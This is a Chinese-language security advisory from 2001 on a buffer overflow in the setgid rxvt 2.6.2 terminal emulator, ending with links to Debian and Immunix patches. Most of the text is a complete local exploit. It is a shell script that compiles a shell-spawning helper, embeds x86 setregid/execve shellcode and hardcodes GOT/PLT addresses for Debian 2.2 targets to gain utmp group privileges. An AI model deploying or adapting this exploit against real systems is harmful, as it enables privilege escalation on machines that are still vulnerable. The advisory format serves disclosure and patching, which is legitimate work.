Rxvt存在缓冲区溢出漏洞 发布时间:2001-06-29 更新时间:2001-06-29 严重程度:高 威胁程度:权限提升 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 rxvt rxvt 2.6.2 详细描述 Rxvt是彩色VT102终端模拟器,可代替XTERM,其中存在缓冲区溢出漏洞。问题产生在部分命令行选项带超长参数传递给rxvt的时候。由于rxvt是以utmp组权限(setgid)安装的,可以导致用户的权限提升。 测试代码 #!/bin/sh # # MasterSecuritY <www.mastersecurity.fr> # # xrxvt.sh - Local exploit for xrxvt 2.6.2 # Copyright (C) 2001 Michel "MaXX" Kaempf <maxx@mastersecurity.fr> # Copyright (C) 2001 Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or (at # your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 # USA # echo "rxvt-2.6.2 exploit for Linux Debian 2.2" echo "Which target :" echo -e "\t0. rxvt 2.6.2 (package deb) on Debian 2.2" echo -e "\t1. 
rxvt 2.6.2 (tarball) on Debian 2.2" echo echo -n "target : " read TARGET cat > /tmp/xx.c <<EOF #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> int main() { char * p_ttyname; char * argv[] = { "/bin/sh", NULL }; p_ttyname = ttyname( STDERR_FILENO ); if ( p_ttyname == NULL ) { return( -1 ); } if ( open(p_ttyname, O_RDONLY) != STDIN_FILENO ) { return( -1 ); } if ( open(p_ttyname, O_WRONLY) != STDOUT_FILENO ) { return( -1 ); } execve( argv[0], argv, NULL ); return( -1 ); } EOF gcc -o /tmp/xx /tmp/xx.c rm -f /tmp/xx.c cat > /tmp/xrxvt.c << EOF #include <stdio.h> #include <string.h> #include <unistd.h> #include <X11/X.h> #include <X11/Xlib.h> #define BUF 256 /* buffer size */ #define EBP 4 #define EIP 4 #define ESC 3 /* alignment */ #define GID "\x2b" #define DISPLAY ":0" #define STACK ( 0xc0000000 - 4 ) Display *d; char shellcode[] = /* setregid( -1, GID ); */ "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31\xc0\xb0\x47\xcd\x80" /* setregid( GID, GID ); */ "\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\x31\xc0\xb0\x47\xcd\x80" /* Aleph One ;) */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/xx"; struct os { int id; char *desc; char *path; unsigned long plt; unsigned long got; }; struct os target[]= { { 0, "rxvt 2.6.2 (package deb) on Debian 2.2", "/usr/X11R6/bin/rxvt-xterm", 0x0804add0, 0x0805c964 }, { 1, "rxvt 2.6.2 (tarball) on Debian 2.2", "/usr/local/bin/rxvt", 0x0804a690, 0x08059e1c }, { 2, NULL, 0, 0 } }; void usage ( char *cmd ) { int i; fprintf(stderr, "rxvt-2.6.2 exploit for Linux Debian 2.2\n"); fprintf(stderr, "usage: %s <target>\n",cmd); fprintf(stderr, "with target:\n\n"); for( i < 0; i < sizeof(target) / sizeof(struct os); i++ ) fprintf(stderr, "%d. 
%s\n", i, target[i].desc); exit( -1 ); } int main(int argc, char *argv[]) { char buffer[ BUF - ESC + EBP + EIP + 12 + 1]; char * exec_argv[] = { NULL, "-T", buffer, NULL }; char * envp[] = { shellcode, NULL }; int i, t; char *path; if ( argc != 2 ) usage(argv[0]); t = atoi(argv[1]); if( t < 0 || t >= sizeof(target) / sizeof(struct os) ) usage( argv[0] ); path = (char *)malloc(strlen(target[t].path)+1); strcpy(path,target[t].path); if ( (d = XOpenDisplay(DISPLAY)) == NULL ){ fprintf(stderr, "Unable to open display: %s\n", DISPLAY); exit(10); } for ( i = 0; i < BUF - ESC + EBP; i++ ) { buffer[ i ] = 'A'; } *( (size_t *) &(buffer[i]) ) = target[t].plt; i += sizeof(size_t); *( (size_t *) &(buffer[i]) ) = target[t].got + 4; i += sizeof(size_t); *( (size_t *) &(buffer[i]) ) = target[t].got + 4; i += sizeof(size_t); *( (size_t *) &(buffer[i]) ) = STACK - (strlen(path) + 1) - sizeof(shellcode); i += sizeof(size_t); buffer[i] = '\0'; exec_argv[0] = path; execve( exec_argv[0], exec_argv, envp ); return( -1 ); } EOF gcc -o /tmp/xrxvt /tmp/xrxvt.c -lX11 rm -f /tmp/xrxvt.c echo "Go to rxvt window and type 'echo -ne \"\033[21t\"' ..." echo "And see ..." 
/tmp/xrxvt $TARGET 解决方案 请下载补丁程序: rxvt rxvt 2.6.2: Debian upgrade 2.2 i386 rxvt_2.6.2-2.1_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt_2.6.2-2.1_i386.deb Debian upgrade 2.2 i386 rxvt-ml_2.6.2-2.1_i386.deb http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt-ml_2.6.2-2.1_i386.deb Debian upgrade 2.2 arm rxvt_2.6.2-2.1_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt_2.6.2-2.1_arm.deb Debian upgrade 2.2 arm rxvt-ml_2.6.2-2.1_arm.deb http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt-ml_2.6.2-2.1_arm.deb Debian upgrade 2.2 alpha rxvt_2.6.2-2.1_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt_2.6.2-2.1_alpha.deb Debian upgrade 2.2 alpha rxvt-ml_2.6.2-2.1_alpha.deb http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt-ml_2.6.2-2.1_alpha.deb Debian upgrade 2.2 m68k rxvt-ml_2.6.2-2.1_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt-ml_2.6.2-2.1_m68k.deb Debian upgrade 2.2 m68k rxvt_2.6.2-2.1_m68k.deb http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt_2.6.2-2.1_m68k.deb Debian upgrade 2.2 ppc rxvt-ml_2.6.2-2.1_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt-ml_2.6.2-2.1_powerpc.deb Debian upgrade 2.2 ppc rxvt_2.6.2-2.1_powerpc.deb http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt_2.6.2-2.1_powerpc.deb Debian upgrade 2.2 sparc rxvt-ml_2.6.2-2.1_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt-ml_2.6.2-2.1_sparc.deb Debian upgrade 2.2 sparc rxvt_2.6.2-2.1_sparc.deb http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt_2.6.2-2.1_sparc.deb rxvt rxvt 2.6.1: Immunix RPM 6.2 i386 rxvt-2.6.1-8_StackGuard_1.i386.rpm http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/rxvt-2.6.1-8_StackGuard_1.i386.rpm Immunix RPM 7.0 i386 rxvt-2.6.3-2_imnx_2.i386.rpm 
http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/rxvt-2.6.3-2_imnx_2.i386.rpm 相关信息 |